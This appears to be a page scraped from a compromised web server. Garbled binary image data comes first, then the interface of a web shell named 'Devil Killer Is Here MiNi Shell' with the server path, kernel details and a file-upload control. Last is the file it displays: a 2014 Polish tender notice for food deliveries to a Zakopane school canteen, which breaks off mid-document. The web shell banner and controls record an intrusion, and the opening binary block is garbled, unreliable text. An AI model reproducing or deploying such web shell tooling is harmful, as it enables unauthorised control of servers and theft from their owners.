JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/391134-N-2014.html

<p class="kh_header"><b>Zakopane: Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopiańskiego Centrum Edukacji.</b><br>
<b>Numer ogłoszenia: 391134 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej , ul. Kasprusie 35A, 34-500 Zakopane, woj. małopolskie, tel. 018 2012786, faks 018 2012786.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zce.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopiańskiego Centrum Edukacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są sukcesywne dostawy artykułów spożywczych na potrzeby stołówki Zakopiańskiego Centrum Edukacji, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171, poz. 1225).
 Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 2 do niniejszej specyfikacji i jest podzielony na 5 pakietów tj.:
I -  Mięso i  wędliny
II-  Artykuły nabiałowe
III- Artykuły sypkie, przyprawy i przetwory
IV- Owoce, warzywa, mrożonki, ryby i jajka
V  - Pieczywo.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.10.00-3, 03.14.25.00-3, 03.22.00.00-9, 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.55.10.00-5, 15.89.60.00-5, 15.81.00.00-9, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma do oferty załączyć wypełniony załącznik nr 2 do siwz - ceny jednostkowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin zapłaty faktury - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie : cena jednostkowa danego produktu może ulec zmianie w przypadku ustawowej stawki od towarów i usług VAT, przy czym zmianie ulegnie wyłącznie cena jednostkowa  brutto, ceny jednostkowe netto pozostaną bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zce.zakopane.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakopiańskie Centrum Edukacji
ul. Małe Żywczańskie 9b
34-500 Zakopane
Tel./fax: 18/20 127 82.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 10:45, miejsce: Zakopiańskie Centrum Edukacji, ul. Kasprusie 35 a, Zakopane - pokój 107..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kości karkowe	10	kg
2.	Mięso gulasz cielęcy	10	kg
3.	Mięso schab wieprzowy
b/kosci	300	kg
4.      	Mięso pieczeń cielęca	10	kg
5.	Mięso pieczeń wołowa	10	kg
6.	Mięso łopatka wieprzowa
b/kości	400	kg
7.	Mięso wołowe - rostbef	10	kg
8.	Filet z kurczaka	500	kg
9.	Udko z kurczaka	300	kg
10.	Kurczak	10	kg
11.	Porcje rosołowe	500	kg
12	Filet z indyka	250	kg
13.	Słonina	10	kg
14.	Filet pieczony z indyka	15	kg
15.	Golonka
prasowana	10	kg
16.	Kiełbasa zwyczajna
	40	kg
17.	Kiełbasa krakowska parzona	20	kg
18.	Kiełbasa krakowska sucha	50	kg
19.	Kiełbasa szynkowa	40	kg
20.	Kiełbasa toruńska	80	kg
21.	Kiełbasa wiejska	10	kg
22.	Szynka wołowa z niską zawartością tłuszczu	10	kg
23.	Szynka drobiowa z niską zawartością tłuszczu	20	kg
24.	Szynka wieprzowa z niską zawartością
tłuszczu	10	kg
25.	Kiełbasa wieprzowa z niską zawartością tłuszczu	10	kg
26.	Parówki drobiowe z niską zawartością tłuszczu	20	kg
27.	Parówki śląskie	50	kg
28.	Frankfuterki
	100	kg
29.	Polędwica z indyka	80	kg
30.	Polędwica  sopocka
	80	kg
31.	Kiełbasa lisiecka	10	kg
32.	Pasztet drobiowy 50 g	1000	szt.
33.	Podgardle wędzone	50	kg
34.	Pasztet domowy	10	kg
35.	Pasztetowa kremowa	15	kg
36.	Szynka gotowana	50	kg
37.	Indyk w galarecie z warzywami	20	kg
38.	Szynka łopatkowa	20	kg
39.	Szynka staropolska	30	kg
40.	Szynka wieprzowa	20	kg
41.	Szynka delikatesowa	10	kg
42.	Szynka konserwowa	40	kg
43.	Wątroba wieprzowa	20	kg
44.	Mięso karczek b/kości	20	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5, 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin zapłaty faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Dostawa artykułów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jogurt owocowy 125 g	800	szt.					
2.	Jogurt naturalny niskotłuszczowy 150 g	100	szt.					
3.	Jogurt naturalny niskotłuszczowy 350 g	50	szt.					
4.	Jogurt owocowy
150 g	300	szt.					
5.	Jogurt owocowy light 350 g	100	szt.					
6.	Kefir 5 kg	20	szt.					
7.	Kefir 400 ml	200	szt.					
8.	Mleko karton 1 l  3,2%	1200	szt.					
9.	Mleko karton 1 l  1.5%	200	szt.					
10.	Śmietana 18% 400 g	700	szt.					
11.	Śmietana 12% 200 g	200	szt.					
12.	Śmietanka 18% 250 ml	50	szt.					
13.	Margaryna mleczna 250 g	120	szt.					
14.	Masło 200 g	1000	szt.					
15.	Masło śmietankowe 200 g	100	szt.					
16.	Masło jogurtowe 200 g	50	szt.					
17.	Serek typu Tartare 20 g	2000	szt.					
18.	Serek typu Twój smak 125 g	50	szt.					
19.	Serek typu Kiri 100 g
	200	szt.					
20.	Ser topiony plastry 140 g	50	szt.					
21.	Serek homogenizowany typu Darek 135 g
	500	szt.					
22.	Ser topiony light - najmniejsza zawartość tłuszczu 150 g	30	szt.					
23.	Serek  typu  Wiejski 150 g	200	szt.					
24.	Ser twarogowy półtłusty	200	kg					
25.	Ser twarogowy chudy	20	kg					
26.	Ser topiony kostka 100 g	100	szt.					
27.	Bryndza 120 g	100	szt.					
28.	Serek typu Kanapkowy 150 g	50	szt.					
29.	Serek typu Fromage 100 g	100	szt.					
30.	Ser topiony krążki 150 g	100	szt.					
31	Ser  typu Feta 12% 270g	20	szt.					
32.	Ser żółty typu Salami 50	kg					
33.	Ser żółty typu Edamski
	40	kg					
34.	Ser żółty typu Gouda	40	kg					
35.	Ser żółty typu Dziurawiec	40	kg					
36.	Ser żółty typu Podlaski
	40	kg					
37.	Ser żółtytypu Wiejski wędzony
	10	kg					
38.	Ser żółty typu Ementaler	20	kg					
39.	Ser żółty z niską zawartością tłuszczu  - do 35%	10	kg					
40.	Mleko odtłuszczone 0% tłuszczu	50	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.53.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin zapłaty faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> Dostawa artykułów sypkich, przypraw, i przetworów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananas w syropie  565 g	10	szt.	
2.	Bazylia 10 g	20	szt.	
3.	Barszcz czerwony -koncentrat 250 ml 	40	szt.	
4.	Chrzan tarty typu Polonaise 180 g	40	szt.	
5.	Cukier kryształ	600	kg	
6.	Cukier puder	20	kg	
7.	Cukier waniliowy 30 g	30	szt.	
8.	Cynamon 20 g	20	szt.	
9.	Czosnek granulowany 1000 g	25	szt.	
10.	Dżem porcjowany 25 g mix typu Tymbark 	6000	szt.	
11.	Dżem wiadro - truskawka  7,2 kg	5	szt.	
12.	Galaretka owocowa 79 g	20	szt.	
13.	Groszek konserw.  typu Pudliszki  400 g	40	szt.	
14.	Grzyby- pieczarki marynowane 0,8 l	20	szt.	
15.	Herbata indyjska 80 g	100	szt.	
16.	Herbata ekspresowa typu Golden assam  100 szt.	50	szt.	
17.	Jabłko prażone 0,9 l 	20	szt.	
18.	Kukurydza konserwowa typu Pudliszki  400 g	70	szt.	
19.	Kasza jęczmienna mazurska 	70	kg	
20.	Kakao typu Decco moreno  200 g	5	szt.	
21.	Kawa  naturalna rozpuszczalna typu  Nescaffe clasic 200g	30	szt.	
22	Kwasek cytrynowy 20 g	100	szt.	
23.	Ketchup łagodny  typu Roleski  450 g	90	szt.	
24.	Przyprawa do potraw typu  Kucharek  1kg	100	szt.	
25.	Kminek 30 g	10	szt.	
26.	Koper suszony 20 g	10	szt.	
27.	Koper solony 180 g	20	szt.	
28.	Liść laurowy 125 g	5	szt.	
29.	Mąka ziemniaczana	40	kg	
30.	Mąka pszenna  poznańska	400	kg	
31.	Makaron łazanki typu Lubella 	40	kg	
32.	Makaron gwiazdki typu Lubella	40	kg	
33.	Makaron muszelki małe typu  Lubella	40	kg	
34.	Makaron spaghetti typu Lubella	100	kg	
35.	Makaron kolanka typu Lubella 	40	kg	
36.	Makaron nitki typu Czarniecki 	100	kg	
37.	Makaron zacierka 250 g	300	szt.	
38.	Musztarda typu Roleski  450 g	60	szt.	
39.	Majonez  typu Roleski
0,9 l 	80	szt.	
40.	Maggi-przyprawa do potraw
typu Winiary  1 l	100	szt.	
41.	Majeranek 7 g	80	szt.	
42.	Miód naturalny 15 g
	400	szt.	
43.	Oregano 10 


	20	szt.	
44.	Ogórki konserwowe typu Roleski 0,9 l	60	szt.	
45.	Olej uniwersalny 5 l	100	szt.	
46.	Ocet winny 225 ml	10	szt.	
47.	Przecier pomidorowy 30%  typu  Pudliszki  0,2 l	100	szt.	
48.	Przecier pomidorowy typy Złoty bażant  400 g
	150	szt.	
49.	Papryka konserwowa typu Roleski  0,9 l	20	szt.	
50.	Płatki zbożowe typu  Choco cool  1000 g	50	szt.	
51.	Płatki kukurydziane typu  Nestle  1000 g	70	szt.	
52.	Proszek do pieczenia 30 g	10	szt.	
53.	Ryż biały typu Sonko 	200	kg	
54.	Sól	120	kg	
55.	Napój owocowy typu Tymbark  0,2 l	150	szt.	
56.	Sos  ogrodowy, sałatkowy typu  Knorr 700 g	5	szt.	
57.	Sos bolognase typu  Knorr 1000 g	5	szt.	
58.	Susz warzywny 100 g	100	szt.	
59.	Wafelki w czekoladzie  typu Grześki 36 g	600	szt.	
60.	Wafelki w czekoladzie typu Prince polo 20 g	600	szt.	

61.	Pieprz naturalny czarny 500 g	20	szt.	
62.	Ziele angielskie 400 g	5	szt.	
63.	Żurek typu Śląski  0,5 l	60	szt.	
64.	Ocet spirytusowy 10 %
0,5 l	10	szt.	
65.	Musli 1000 g
	10	szt.	
66.	
Kisiel 38 g	20	szt.	
67.	Kotlety sojowe 100 g
	30	szt.	
68.	Przyprawa do drobiu 500 g	5	szt.	
69.	Papryka w proszku 1000g ostra łagodna	2	szt.	
70.	
Woda mineralna 0,5 l niegazowana	500	szt.	
71.	Woda mineralna gazowana 0,5 l	100	szt.	
72.	Woda mineralna 1,5 l niegazowana	300	szt.	
73.	Woda mineralna gazowana 1,5 l	100	szt.	
74.	Suszone morele 150 g	10	szt.	
75.	Suszone sliwki typu kalifornijskie 150 g	10	szt.	
76.	Orzechy włoskie łuskane	2	kg	
77.	Soczewica 	5	kg	
78.	Tuńczyk w sosie własnym 170 g	10	szt.	
79.	Oliwki 1 l	5	szt.	
80.	Pestki dyni 100 g
	10	szt.	
81.	Herbata -owocowa mieszanka -saszetki 60 szt. 	5	szt.	
82.	Kasza gryczana
	20	kg	
83.	Makaron z mąki durum	10	kg	
84.	Zioła prowansalskie 10 g
	20	szt.	
85.	Tymianek 10 g
	20	szt.	
86.	Pieprz ziołowy 10 g	20	szt.	
87.	Kawa parzona typu Prima  500 g	20	szt.
88	Kawa rozpuszczalna typu  Prima 200 g	20	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-5, 15.87.00.00-7, 15.41.11.00-3, 15.86.32.00-7, 15.86.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin zapłaty faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> Dostawa owoców, mrożonek, ryb i jajek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brzoskwinie	50	kg
2.	Banany	100	kg
3.	Botwina	50	szt.
4.	Buraki czerwone	350	kg
5.	Cebula	170	kg
6.	Cytryny	150	kg
7.	Fasola  Jaś  średni	50	kg
8.	Fasola szparagowa	50	kg
9.	Fasola szparagowa mrożona	130	kg
10.	Groch łuszczony	40	kg
11.	Grzyby pieczarki	50	kg
12.	Jabłka	300	kg
13.	Jaja	4000	szt.
14.	Kapusta biała	350	kg
15.	Kapusta czerwona	100	kg
16.	Kapusta włoska	50	szt.
17.	Kapusta pekińska	100	szt.
18.	Kapusta kiszona	120	kg
19.	Kalafior	40	szt.
20.	Kalafior mrożony	70	kg
21.	Koper zielony	350	szt.
22.	Marchew korzeniowa	550	kg
23.	Mandarynki	100	kg
24.	Mieszanka warzywna  bukiet z warzyw 	170	kg
25.	Marchew z groszkiem mrożona	40	kg
26.	Mieszanka kompotowa mrożona	400	kg
27.	Ogórki zielone	200	kg
28.	Ogórki kiszone	150	kg
29.	Pomidory	200	kg
30.	Pory	60	kg
31.	Papryka czerwona	50	kg
32.	Pietruszka zielona	300	szt.
33.	Pietruszka korzeń	50	kg
34.	Rzodkiewka	50	szt.
35.	Ryba - filet mrożony z mintaja  płaty	100	kg
36.	Ryba - filet mrożony z dorsza	50	kg
37.	Seler korzeniowy	50	kg
38.	Sałata zielona	600	szt.
39.	Szczypiorek	70	szt.
40.	Ziemniaki	4000	kg
41.	Truskawki mrożone	80	kg
42.	Arbuz	100	kg
43.	Borówka 	20	kg
44.	Truskawka 
	20	kg
45.	Maliny	10	kg
46.	Porzeczki czarne
	10	kg
47.	Nektarynki
	50	kg
48.	Wiśnie	10	kg
49.	Czereśnie	10	kg
50.	Śliwki	10	kg
51.	Cukinia
	10	kg
52.	Sałata lodowa	30	szt.
53.	Pomarańcze	10	kg
54.	Morele	10	kg
55.	Fasolka czerwona	5	kg
56.	Fasolka biała	5	kg
57.	Brokuły	30	szt.
58	Cebula czerwona	5	
kg
59.	Ryba-filet mrożony z tilapi	50	
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.14.25.00-3, 15.22.10.00-3, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin zapłaty faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 05 <b>NAZWA:</b> Dostawa pieczywa.</p>
